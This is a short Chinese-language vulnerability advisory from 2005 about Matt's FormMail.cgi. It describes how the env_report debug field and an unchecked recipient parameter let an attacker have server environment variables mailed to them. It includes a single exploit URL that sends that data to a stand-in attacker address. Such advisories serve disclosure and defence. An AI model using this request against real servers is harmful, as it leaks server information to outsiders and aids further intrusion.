添加时间:
2005-09-25

系统编号:
WAVDB-00680

影响版本:
Matt FormMail.cgi

程序介绍:

Matt FormMail.cgi是一个CGI的邮件发送程序

漏洞分析:

Formmail.cgi包含一个调试的字段env_report,它的值是一系列的环境变量，这些环境变量将被嵌入消息内部。由于Formmail.cgi没有检查收件人地址的完整性，导致收件人地址可以被改变，因此消息可以被发给攻击者的账号，这样攻击者就可以获得环境变量的信息了。攻击者可以利用这些信息进行下一步的攻击。

漏洞利用:

 http://www.formmail.site/cgibin/formmail.cgi?env_report=PATH&recipient=attacker@attacker.site
 &required=&firstname=&lastname=&email=&message=&Submit=Submit

信息来源:
<* 来源：Black Watch Labs (www.perfectotech.com/blackwatchlabs/) *>